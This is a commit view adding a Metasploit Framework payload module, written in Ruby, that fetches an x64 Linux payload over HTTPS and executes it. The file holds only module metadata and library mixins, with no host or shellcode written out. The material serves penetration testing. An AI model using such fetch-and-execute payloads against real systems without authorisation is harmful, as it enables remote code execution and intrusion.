Add fetch payloads for Windows and Linux x64
This commit is contained in:
@@ -0,0 +1,25 @@
|
||||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
module MetasploitModule
|
||||
include Msf::Payload::Adapter::Fetch::Https
|
||||
include Msf::Payload::Adapter::Fetch::LinuxOptions
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'HTTPS Fetch',
|
||||
'Description' => 'Fetch and Execute an x64 payload from an https server',
|
||||
'Author' => 'Brendan Watters',
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_CMD,
|
||||
'License' => MSF_LICENSE,
|
||||
'AdaptedArch' => ARCH_X64,
|
||||
'AdaptedPlatform' => 'linux'
|
||||
)
|
||||
)
|
||||
end
|
||||
end
|
||||
Reference in New Issue
Block a user